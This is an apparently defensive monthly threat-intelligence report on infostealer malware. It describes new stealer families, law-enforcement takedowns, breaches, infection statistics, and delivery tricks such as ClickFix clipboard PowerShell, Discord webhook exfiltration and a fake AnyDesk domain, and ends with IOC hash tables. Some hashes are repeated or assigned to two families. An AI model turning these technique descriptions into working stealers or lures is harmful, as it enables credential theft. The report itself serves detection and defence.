Executive Summary
This monthly report highlights the key developments in the infostealer landscape, drawn primarily from community-sourced intelligence and open-source threat feeds. The following points summarize this month’s most important findings:
-
New Stealer Families Detected
Community monitoring, particularly from social media threat intelligence sources and malware repositories, led to the discovery of several new stealer families, including Katz Stealer, Cmimai Stealer, and Switch Stealer.
-
Major Threat Events
Two significant threat events marked this month. Operation Secure, a global law enforcement crackdown, targeted multiple infostealer networks, resulting in arrests and infrastructure seizures. In contrast, the attempted takedown of Lumma Stealer remains incomplete, with numerous panels and C2 servers still active.
-
Notable Data Breaches Linked to Infostealers
A significant data breach was observed this month, impacting user credentials and other sensitive data.
-
Global Compromise Trends
Stealer log analysis reveals geographic and service-based trends. The most compromised countries, email providers, and social platforms are mapped and visualized to show where stealer campaigns are having the greatest impact.
-
Supporting Case Studies & IoC Tables
A few case studies have been included to spotlight unusual patterns or specific campaigns observed this month. These come with detailed IOCs to support threat detection and response efforts.
New Infostealer Threats Identified
Katz stealer
Katz Stealer was recently advertised on a cybercrime forum by a threat actor using the alias "Katz Stealer". This lightweight malware, written in C/ASM and under 100KB in size, is marketed as fully undetectable and designed for credential theft. It comes equipped with a wide range of features targeting various platforms and services, including Chrome password decryption, MetaMask wallet theft, OAuth token harvesting, and Telegram injection.
The malware also includes a dedicated web panel that offers advanced functionality such as two-factor authentication (2FA) login, log filtering by geographic and temporal parameters, file and folder search with export capabilities, and integration with Discord and Telegram for alerts. The panel supports features like stealth mode, fake error pop-ups, anti-VM detection, and self-deletion for evasion.
Cmimai Stealer
Cmimai Stealer is a malicious Visual Basic Script (VBS)-based stealer that is currently being distributed, with evidence suggesting it originated from a user based in 🇵🇸 (Palestine). Upon execution, the stealer performs system reconnaissance by gathering basic system information such as the computer name, username, and operating system version. It then attempts to collect browser-related data, likely including cookies, saved passwords, and other autofill data. This data is formatted into a structured Discord webhook payload and exfiltrated via the Discord API using embedded JSON. The script includes functions for sending this information and logs various stages of the process, indicating a designed flow for initialization, data collection, and ongoing diagnostic reporting.
Switch Stealer
In this month, we saw a new script based stealer targeting Windows known as "Switch's Private Stealer," which claims to extract sensitive data such as passwords, cookies, cards, history, downloads, and Discord tokens. This stealer or grabber uses GoFile webservice for data exfiltration.
Major Threat Event
Operation Secure: Global Crackdown on Infostealer Networks
Operation Secure, a coordinated international cybercrime takedown led by INTERPOL, was active between January and April 2025, with the results officially announced on June 11. The operation focused on disrupting the infrastructure behind major information stealers, successfully taking down over 20,000 IP addresses linked to malware such as Vidar,Lumma Stealer (LummaC2), and Rhadamanthys. INTERPOL collaborated closely with cybersecurity firms including Group-IB, Kaspersky, and Trend Micro, producing Cyber Activity Reports that provided critical intelligence. This intelligence was then shared with cybercrime units across Asia, aiding in the identification and arrest of several cybercriminals and the seizure of malicious domains used to distribute stealer malware.
The Unfinished Takedown of Lumma Stealer
In May 2025, Microsoft, in collaboration with global cybersecurity partners, conducted a coordinated disruption campaign against Lumma Stealer's infrastructure. The operation reportedly took down over 1,000 domains and more than 90 associated Telegram channels used for distribution and command-and-control.
However, Lumma has not been fully neutralized. According to threat data from MalwareBazaar and other OSINT sources, active Indicators of Compromise (IOCs) were observed on June 17–18, and domain modification timestamps show activity as recent as June 30, 2025. These findings indicate that parts of Lumma’s infrastructure remain functional or are being reconstituted, highlighting the infostealer’s adaptability and the challenges in achieving complete shutdowns of such malware ecosystems.
Notable Data Breaches
MassLogger Malware Spread via Compromised Government Email in Bosnia
A recent MassLogger malware campaign was observed leveraging an allegedly compromised email account belonging to an employee of the Ministry of Agriculture, Water Management and Forestry of Bosnia and Herzegovina. The initial phishing vector involves a JavaScript file, which connects to a remote server to download additional payloads.
MassLogger is a fully-featured malware written in .NET, equipped with various modules. It is designed for ease of use, even by less technically skilled malicious actors. Key functionalities include FTP credential theft, email access, keylogging, and multiple evasion techniques to bypass sandboxes and honeypots. The primary objective of MassLogger is to gather and exfiltrate sensitive data from infected systems. It scans the host for specific software installations and attempts to retrieve stored passwords. The gathered data is compiled into a log file, as its name suggests, and is then exfiltrated to the attacker’s command-and-control server.
Paraguay Faces Historic Data Breach Exposing 7.4 Million Citizens
A major data breach has exposed 7.4 million records containing the personally identifiable information (PII) of Paraguayan citizens, now listed for sale on the dark web. Threat actors are attempting to sell this data rapidly, raising urgent concerns about imminent exploitation and potential mass victimization across the country. The cybercriminals behind the attack have demanded a $7.4 million ransom equivalent to $1 per citizen in what is being described as one of the most severe cybersecurity incidents in Paraguay’s history. The extortion campaign includes a symbolic deadline of Friday, June 13, 2025.
Early signs of vulnerabilities in the country’s digital infrastructure surfaced nearly two years ago, when one of the government’s systems was reportedly compromised, although no public data leak occurred at the time. Notably, accusations were directed at China for allegedly conducting malicious cyber operations targeting South America, with Paraguay explicitly named among the possible targets.
The Hy-Vee Data Breach and the Role of Infostealers
The data breach at Hy-Vee was traced back to an infostealer malware infection affecting over 50 employee devices. Malware strains such as StealC, Lumma, and RedLine were used to silently extract saved login credentials, including those granting access to internal Atlassian tools like Jira and Confluence. These compromised credentials were later acquired by the hacker group Stormous, which exploited them to access Hy-Vee’s internal systems—bypassing technical defenses entirely by using legitimate employee logins. On June 23rd, Stormous publicly leaked the stolen data on the dark web and issued a ransom demand, warning that additional sensitive information would be released if the company failed to comply within a limited timeframe.
Malware Activity Analysis
Based on cybersecurity data collected from June 2 to June 23, 2025,India emerged as the most targeted country, recording 5,390 total infections, while Lumma was identified as the dominant stealer malware family, responsible for over 32,000 infections during the period. Threat actors heavily abused google.com, leading to the compromise of 37,255 domains, and gmail.com was the most affected email provider, with an overwhelming 1.87 million compromised accounts. Facebook topped the list of compromised social media platforms, with 30,736 affected accounts, largely due to phishing and spam campaigns. This analysis highlights a clear pattern of widespread cyber threats primarily targeting major tech platforms and developing nations, with malware families like Lumma showing persistent and dominant activity across the web during the analyzed timeframe. On average, 19,400 infections were happening daily in the month of June, and RedLine stealer accounted for approximately 23% of all infections, marking it as a significant threat alongside Lumma.
Case Studies
Amatera Stealer Uses ClickFix Trick to Infect Victims
Amatera Stealer, formerly known as ACR Stealer, has recently undergone a significant transformation with major updates and complete rebranding. It is now being actively spread through the ClearFake campaign — a malicious JavaScript framework deployed on compromised websites, often WordPress-based. This framework uses social engineering tactics, such as fake browser update prompts or error messages, to trick users into unknowingly initiating the malware.
A key technique used in this campaign is ClickFix. Victims are asked to click on a CAPTCHA, which secretly copies a malicious PowerShell command to their clipboard. They are then misled into running this command themselves, which triggers the malware’s execution process. Once launched, Amatera Stealer downloads multiple payloads from the internet and uses shellcode injection to remain stealthy and bypass security measures.
Unlike older stealers that relied on platforms like Discord or Telegram to exfiltrate stolen data, Amatera Stealer now operates a dedicated infrastructure. It uses its own website and control panel, giving the operators a centralized place to manage the stolen data. This control panel allows them to view, sort, and analyze the exfiltrated information in real-time. It also reflects their own custom branding, showcasing a more professional and organized cybercriminal operation.
Amatera Stealer is highly configurable. Based on the instructions it receives from its Command and Control (C2) server, it targets and steals sensitive data from various installed software, such as web browsers, cryptocurrency wallets, and other applications. After each function completes, it sends the collected data back to the C2 via POST requests, making it a robust, stealthy, and versatile threat in the modern cybercrime landscape.
New Phamadrone Stealer Variant Impersonates AnyDesk Website
A new variant of the Phamadrone stealer malware has been detected. This variant uses a fake website that impersonates the legitimate remote desktop software AnyDesk, hosted on the suspicious domain anydeske[.]icu. When users visit this fake site, it downloads a .NET loader program, which then launches the actual stealer malware designed to steal sensitive information from the infected computer.
The attackers behind this campaign use a control panel and Pastebin to distribute and download additional harmful payloads, making the malware flexible and capable of receiving updates or new components remotely.
Once installed, the malware communicates with the malicious domain anydeske[.]icu to download further harmful software modules. It also sends stolen data back to this server, indicating the malware’s primary goal is to exfiltrate sensitive information from victims. Additionally, the malware collects information about the infected system by running commands like whoami (which reveals the current user) and reading configuration files such as desktop.ini from multiple user folders.
KimJongRAT Stealer Variants
we saw two new variants of the KimJongRAT stealer, a malware family first identified in 2013, showcasing its persistent evolution. One variant utilizes a Portable Executable (PE) file, while the other employs a PowerShell implementation, both initiated through a malicious Windows shortcut (LNK) file that downloads a dropper from an attacker-controlled CDN. The PE variant deploys a loader, a decoy PDF, and a text file, with the stealer component (net64.log) targeting broader data such as FTP and email credentials, compiled as recently as December 2024. This multi-stage approach, combined with encrypted communications using XOR and RC4 ciphers, demonstrates the malware's sophistication in evading detection.
The PowerShell variant, conversely, focuses on stealing system and browser data, including cryptocurrency wallet extensions, and includes a ZIP archive with keylogger components. It features anti-VM checks to avoid sandbox analysis, though these are imperfect, and continuously interacts with its command-and-control server to upload stolen data and download additional payloads. Both variants, with samples dating back to August 2024 and updates into March 2025, leverage legitimate CDN services to mask their activities, underscoring the ongoing threat posed by KimJongRAT's adaptability and its focus on high-value targets like cryptocurrency assets.
Rust-based Myth Stealer masquerades as game tools to steal user information
Cybersecurity researchers have recently discovered a new information-stealing malware called Myth Stealer, developed in the Rust programming language. This previously unknown threat is being spread through fake gaming websites and cracked software downloads, including titles like DDrace. It first appeared in late December 2024, initially promoted as a free beta version on Telegram. Since then, it has evolved into a malware-as-a-service (MaaS), making it easier for cybercriminals to use and distribute.
Myth Stealer tricks users by displaying a fake setup window during installation, while secretly decrypting and running malicious code in the background. Its main goal is to steal sensitive data such as passwords, browser cookies, and autofill information from popular web browsers based on Chromium (like Google Chrome) and Gecko (like Mozilla Firefox). The malware also uses advanced techniques like string obfuscation to avoid detection and analysis.
The operators behind Myth Stealer used Telegram channels to promote the malware and sell stolen account data. Although many of these Telegram channels have now been taken down, the malware was also distributed through a fake Blogger page, helping it reach more victims.
References
- https://www.proofpoint.com/us/blog/threat-insight/amatera-stealer-rebranded-acr-stealer-improved-evasion-sophistication?utm_source=twitter&utm_medium=social_organic
- https://x.com/1ZRR4H/status/1933245219748581862
- https://unit42.paloaltonetworks.com/kimjongrat-stealer-variant-powershell/
- https://www.interpol.int/News-and-Events/News/2025/20-000-malicious-IPs-and-domains-taken-down-in-INTERPOL-infostealer-crackdown
- https://thehackernews.com/2025/06/rust-based-myth-stealer-malware-spread.html
- https://www.infostealers.com/info-stealers-reports/
- https://hackedlist.io/statistics
- https://www.technadu.com/hy-vees-atlassian-accounts-allegedly-compromised-in-stormous-group- claim/600947/
- https://x.com/abuse_ch/status/1935355473743458334
- https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/
- https://threatfox.abuse.ch/browse.php?search=tag%3Alumma
- https://www.interpol.int/en/News-and-Events/News/2025/20-000-malicious-IPs-and-domains-taken-down-in-INTERPOL-infostealer-crackdown
- https://x.com/suyog41/status/1937061641713008696
Detailed IOC Tables
| File Hash (SHA 256) | Stealer |
|---|---|
| 120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2 | Amatera Stealer |
| 7d91a585583f4aa1a3ab3cb808d7bc351d6140b3ae1deeef9d51c6414c11baea | Amatera Stealer |
| 120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2 | Amatera Stealer |
| 35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af | Amatera Stealer |
| 2960d5f8a3d9b0a21d6b744092fe3089517ecf2e49169683f754bfe9800e3991 | Amatera Stealer |
| ad9ffd624e27070092ff18a10e33fa9e2784b2c75ac9ac4540fa81cf5bd84e55 | Amatera Stealer |
| 055a883f18ffcc413973fa45383e72e998aae87909af5f9507b6384bfec34a5b | Amatera Stealer |
| b1edc65392305bb7062c86930baae32ead04731e9dbd806ab6a5c382e9e52e3f | Phamadrone Stealer |
| 85be5cc01f0e0127a26dceba76571a94335d00d490e5391ccef72e115c3301b3 | KimJongRAT Stealer |
| bdb272189a7cdcf166fce130d58b794b242c582032f19369166b3d4cfdc0902c | KimJongRAT Stealer |
| 2ba3397cba28af1a929403910035b78bf946acbafe9e186ac329b55086fe7703 | KimJongRAT Stealer |
| accf50d769408253bf9a7da378228debce7c8f6d60fb76da48196fe42cacedf3 | KimJongRAT Stealer |
| 96df4f9cb5d9cacd6e3b947c61af9b8317194b1285936ce103f155e082290381 | KimJongRAT Stealer |
| c356cd9fea07353a0ee4dfd4652bf79111b70790e7ed63df6b31d7ec2f5953d5 | KimJongRAT Stealer |
| 5097553dff2a2da4f16b80a346fe543422b22d262e0c40e187b345afbcc7d41a | KimJongRAT Stealer |
| ef0ce406fa722d30bfa094c660e81ed4a72ff8c75a629081293f4a86e0e587c2 | KimJongRAT Stealer |
| 3d06b3a31d2d3a28485bfdc6def197b400f1c4bafefefd59697b7cac58c06600 | Katz Stealer |
| 1847288195fcfc03fc186bf4eead4268048ef5e082dedb963b3450ee07c23883 | Myth Stealer |
| 65a84024daf30c12fd2e76db661bf6e85f3da30bb3aaa7e774152855d718b0c4 | Myth Stealer |
| e5d09da6648add4776de8091b0182b935405791bf41476465b0e7dcb066fc0dc | Myth Stealer |
| f7cb6626e311181d9ded9536b1fbdf709b8254abd8d0810e04cebefea2fed131 | Myth Stealer |
| acd66cb5f1447b803245c495400ad0886352920e35defcca6c45519fb7d33693 | Myth Stealer |
| 6c54e6648a6a33583d7707a9f7c5e83dd08ed481df6354c52e8f81e729d74a82 | Myth Stealer |
| b1edc65392305bb7062c86930baae32ead04731e9dbd806ab6a5c382e9e52e3f | Phemedrone Stealer |
| 7dd53d2ea74d37bfee3695180367df950b816a37bbecfdd0cff63f5cf5460354 | Cmimai Stealer |
| 3d06b3a31d2d3a28485bfdc6def197b400f1c4bafefefd59697b7cac58c06600 | Switch Stealer |
.png)
